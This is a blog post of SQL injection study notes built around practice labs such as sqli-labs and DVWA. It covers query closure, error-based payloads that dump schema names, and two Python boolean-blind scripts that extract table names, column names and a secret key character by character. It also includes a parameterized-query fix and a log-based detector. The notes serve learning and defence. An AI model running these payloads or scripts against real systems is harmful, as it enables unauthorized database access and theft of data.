Some notes on SQL

By Yichen / 2023-08-11 / No comments yet / 25 views

Comment markers: '#', '-- ' (two dashes followed by a space)
DDL:
CREATE DATABASE dbname   (create a database)
DROP DATABASE dbname     (drop a database)
show databases           (list databases)
show tables              (list tables)
select database()        (show the current database name)
desc tablename           (show a table's structure)
Simple statements:

select column_name from table_name where condition   (query statement)

INSERT INTO table_name (column1, column2, column3, ...)
VALUES (value1, value2, value3, ...);   (insert statement)

UPDATE table_name SET column1 = value1, column2 = value2, ... WHERE condition;   (update statement)

Closure

Closure comes up quite often in this set of challenges, so here is a short summary.
In a select statement, closing the injection point involves the following symbols:

  • single quote '
  • double quote "
  • parenthesis )

and the closure takes one of the following forms:

  • No closure

    $id = $id;
    $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
  • Single-quote closure

    $id = "'" . $id . "'";
    $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
  • Double-quote closure

    $id = '"' . $id . '"';
    $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
  • Parenthesis closure

    $id = $id;
    $sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
  • Mixed closure, a combination of the above; here double quotes plus three pairs of parentheses

    $id = '"' . $id . '"';
    $sql="SELECT * FROM users WHERE id=((($id))) LIMIT 0,1";

Faced with an injection point like this

http://inhann.top:12345/Less-4/?id=

our first step is usually to close the context,
like this

http://inhann.top:12345/Less-4/?id=1'%23
http://inhann.top:12345/Less-4/?id=1"%23
http://inhann.top:12345/Less-4/?id=1"))%23
http://inhann.top:12345/Less-4/?id=1%23

In some situations the steps shown in the PDF below can be used to work out the closure,
but first the limitations of the closure technique described below should be made clear:

  • id goes almost straight into the select statement, at most passed through an escape function
  • a syntax error, when one occurs, can be recognised in the response

In the simple case, try both quote characters first and see whether each one triggers an error; if both do, no quote is used.
Then add a comment marker; if it still errors after the comment is added, parentheses are involved.
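As an added example (not code from the original post or from sqli-labs), the closure styles above reproduced in Python: build_query mirrors the PHP concatenation, vulnerable_lookup runs it against a constructed SQLite table and reports the syntax error the closure test relies on, and safe_lookup is the parameterized fix. SQLite has no '#' comment, so the probes use the '-- ' marker listed at the top of the page; the table contents and function names are assumptions.

```python
import sqlite3

# Closure styles from the PHP snippets above: how $id is wrapped before concatenation.
CLOSURES = {
    "none": lambda v: v,
    "single": lambda v: "'" + v + "'",
    "double": lambda v: '"' + v + '"',
    "paren": lambda v: "(" + v + ")",
    "mixed": lambda v: '((("' + v + '")))',
}

def build_query(closure, user_input):
    """Reproduce the vulnerable concatenation: the input becomes part of the SQL text."""
    return "SELECT * FROM users WHERE id=%s LIMIT 0,1" % CLOSURES[closure](user_input)

def make_db():
    """Constructed in-memory stand-in for the lab's users table (sample rows, not the lab's)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "alice", "pw1"), (2, "Angelina", "pw2")])
    return conn

def vulnerable_lookup(conn, closure, user_input):
    """Run the concatenated query. Returns ("rows", [...]) or ("error", message);
    the error branch is the syntax-error tell the closure section relies on."""
    try:
        return "rows", conn.execute(build_query(closure, user_input)).fetchall()
    except sqlite3.OperationalError as exc:
        return "error", str(exc)

def safe_lookup(conn, user_input):
    """Hardened form: a bound parameter is always one value, whatever quotes it contains,
    so there is nothing to close and no comment marker can truncate the statement."""
    return conn.execute("SELECT * FROM users WHERE id=? LIMIT 0,1", (user_input,)).fetchall()

if __name__ == "__main__":
    db = make_db()
    for probe in ("1", "1'", "1'-- "):
        print(repr(probe), vulnerable_lookup(db, "single", probe), safe_lookup(db, probe))
```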

Error-based injection

Error-based injection is extremely powerful.
Here are a few payloads.

Super payloads

A few payloads that are very satisfying to use

(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0D,0x0A,' [ ',table_schema,' ] > ',table_name,' > ',column_name,0x7C))))a)

and its general form

(select (@) from (select(@:=0x00),(select (@) from (db_data.table_data) where (@)in (@:=concat(@,0x0D,0x0A,0x7C,' [ ',column_data1,' ] > ',column_data2,' > ',0x7C))))a)

  • dvwa low

    http://localhost/dvwa/vulnerabilities/sqli/?id='union select "a",(select (select (@p) from (select(@p:=0x00),(select (@p) from (information_schema.columns) where (table_schema>=@p) and (@p)in (@p:=concat(@p,0x0D,0x0A,' [ ',table_schema,' ] > ',table_name,' > ',column_name,0x7C))))a))%23&Submit=Submit#

  • dvwa medium

    id=1 union select 1,(select (select (@p) from (select(@p:=0x00),(select (@p) from (information_schema.columns) where (table_schema>=@p) and (@p)in (@p:=concat(@p,0x0D,0x0A,0x5b,table_schema,0x5d,0x3e,table_name,0x3e,column_name,0x7C))))a))%23&Submit=Submit

  • dvwa high

    1'union select 1,(select (select (@p) from (select(@p:=0x00),(select (@p) from (information_schema.columns) where (table_schema>=@p) and (@p)in (@p:=concat(@p,0x0D,0x0A,0x5b,table_schema,0x5d,0x3e,table_name,0x3e,column_name,0x7C))))a))#

select with visible output

The most basic case, a select whose results are echoed back; sharing that as well

Column Num

Payload to obtain the column count

Blind injection script

Here is a boolean-based blind injection script

Object-oriented version
# coding=utf-8
import requests


class BoolSqlier:
    url = ""

    def __init__(self, database=""):
        self.database = database
        self.url = BoolSqlier.url

    def get_database(self):

        def send_request(i, mid):
            # Ask whether the ASCII code of the i-th character of database() is greater than mid
            payload = "1'and(ascii(substr(database(),{},1))>{})#".format(i, mid)
            params = {"id": payload}
            resp = requests.get(self.url, params=params)
            return resp

        def database_i_ascii_bt_mid(resp):
            # Less-5 answers "You are in..." only when the injected condition is true
            return "You are in..........." in resp.text

        database = ""
        for i in range(1, 50):
            # head and tail bound the ASCII range a character of the database name can take
            head = 32
            tail = 127
            while head < tail:
                mid = (head + tail) >> 1
                resp = send_request(i, mid)
                if database_i_ascii_bt_mid(resp):
                    head = mid + 1
                else:
                    tail = mid
            if head != 32:
                database += chr(head)
                print(database)
        self.database = database
        print(database)


if __name__ == "__main__":
    BoolSqlier.url = "http://localhost:12345/Less-5/"
    sqli = BoolSqlier()
    sqli.get_database()

Procedural version

import re
import requests

session = requests.session()
url = "http://localhost/sqli-labs/Less-65/"
table_name = ""
column_name = ""
key = ""
count = 0

# Step 1: recover the table names of the current database, one character at a time.
for i in range(1, 30):
    def what_i_want_i_less_than_or_equal_mid(mid):
        global count
        count += 1
        print("on the {}th request now.... ".format(count))
        payload = "1\") and ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))<={}#".format(i, mid)
        params = {"id": payload}
        resp = session.get(url=url, params=params)
        if "Angelina" in resp.text:
            return True
        return False

    print("--" * 70, "table_name")
    print("processing the {}th char now.... ".format(i))
    low = 32
    high = 127
    while low < high:
        mid = (low + high) >> 1
        if what_i_want_i_less_than_or_equal_mid(mid):
            high = mid
        else:
            low = mid + 1
        print("{}th request completed!!!".format(count))

    if low == 32:
        break
    table_name += chr(low)
    print(table_name)
    count = 0
print("!!" * 70)
print("This is Your Loved table_name!!!!!!!!!!")
print(table_name)


# Step 2: recover the column names of that table.
for i in range(1, 30):
    def what_i_want_i_less_than_or_equal_mid(mid):
        global count
        count += 1
        print("on the {}th request now.... ".format(count))
        payload = "1\") and ascii(mid((select group_concat(column_name) from information_schema.columns where table_name='{}'),{},1))<={}#".format(table_name, i, mid)
        params = {"id": payload}
        resp = session.get(url=url, params=params)
        if "Angelina" in resp.text:
            return True
        return False

    print("--" * 70, "column_name")
    print("processing the {}th char now.... ".format(i))
    low = 32
    high = 127
    while low < high:
        mid = (low + high) >> 1
        if what_i_want_i_less_than_or_equal_mid(mid):
            high = mid
        else:
            low = mid + 1
        print("{}th request completed!!!".format(count))

    if low == 32:
        break
    column_name += chr(low)
    print(column_name)
    count = 0
# Keep only the column whose name starts with "secret_".
pattern = "secret_...."
column_name = re.findall(pattern, column_name)[0]
print("!!" * 70)
print("This is Your Loved column_name!!!!!!!!!!")
print(column_name)

# Step 3: read the value of that column.
for i in range(1, 30):
    def what_i_want_i_less_than_or_equal_mid(mid):
        global count
        count += 1
        print("on the {}th request now.... ".format(count))
        payload = "1\") and ascii(mid((select group_concat({}) from challenges.{}),{},1))<={}#".format(column_name, table_name, i, mid)
        print(payload)
        params = {"id": payload}
        resp = session.get(url=url, params=params)
        if "Angelina" in resp.text:
            return True
        return False

    print("--" * 70, "key")
    print("processing the {}th char now.... ".format(i))
    low = 32
    high = 127
    while low < high:
        mid = (low + high) >> 1
        if what_i_want_i_less_than_or_equal_mid(mid):
            high = mid
        else:
            low = mid + 1
        print("{}th request completed!!!".format(count))

    if low == 32:
        break
    key += chr(low)
    print(key)
    count = 0

print("!!" * 70)
print("This is your loved key!!!!!!!!!!")
print(key)
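From the defender's side, the two scripts above leave a very recognisable trace: one client sending a burst of requests whose parameter contains ascii(substr()) or ascii(mid()) comparisons, a closing quote and a comment marker, about seven of them per recovered character. As an added example (not from the original post), a small access-log classifier that flags those shapes; the log lines are constructed sample data and the signature names are my own.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import parse_qs, urlparse

# Constructed access-log lines (sample data, not real traffic), shaped like the
# requests the boolean-blind script above sends against Less-5.
SAMPLE_LOG = """\
10.0.0.5 - - [11/Aug/2023:10:00:01 +0800] "GET /Less-5/?id=1 HTTP/1.1" 200 712
10.0.0.7 - - [11/Aug/2023:10:00:02 +0800] "GET /Less-5/?id=1'%23 HTTP/1.1" 200 712
10.0.0.7 - - [11/Aug/2023:10:00:03 +0800] "GET /Less-5/?id=1'and(ascii(substr(database(),1,1))>79)%23 HTTP/1.1" 200 712
10.0.0.7 - - [11/Aug/2023:10:00:03 +0800] "GET /Less-5/?id=1'and(ascii(substr(database(),1,1))>103)%23 HTTP/1.1" 200 655
10.0.0.7 - - [11/Aug/2023:10:00:04 +0800] "GET /Less-5/?id=1'and(ascii(substr(database(),1,1))>91)%23 HTTP/1.1" 200 712
10.0.0.9 - - [11/Aug/2023:10:00:05 +0800] "GET /Less-5/?id=2 HTTP/1.1" 200 700
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

# Signatures derived from the payload shapes on this page: closure probes, comment
# terminators, the ascii(substr()/mid()) oracle and information_schema dumps.
SIGNATURES = {
    "quote_probe": re.compile(r"^\d+['\")]"),
    "comment_terminator": re.compile(r"#|--\s"),
    "char_oracle": re.compile(r"ascii\s*\(\s*(substr|mid)\s*\(", re.I),
    "schema_dump": re.compile(r"information_schema", re.I),
}

def classify(line):
    """Return (client_ip, set of matched signature names), or None for unparsable lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, path, _status = m.groups()
    hits = set()
    # parse_qs percent-decodes, so %23 is already '#' when the signatures run.
    for values in parse_qs(urlparse(path).query, keep_blank_values=True).values():
        for value in values:
            hits.update(name for name, rx in SIGNATURES.items() if rx.search(value))
    return ip, hits

def summarize(log_text):
    """Per-IP count of each signature over the whole log."""
    per_ip = defaultdict(Counter)
    for line in log_text.splitlines():
        parsed = classify(line)
        if parsed and parsed[1]:
            per_ip[parsed[0]].update(parsed[1])
    return per_ip

def suspect_ips(log_text, min_oracle_hits=3):
    """A binary search over 32..127 costs ~7 oracle requests per character, so a burst
    of char_oracle hits from one client is the signal worth alerting on."""
    return sorted(ip for ip, c in summarize(log_text).items() if c["char_oracle"] >= min_oracle_hits)
```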

Unique insights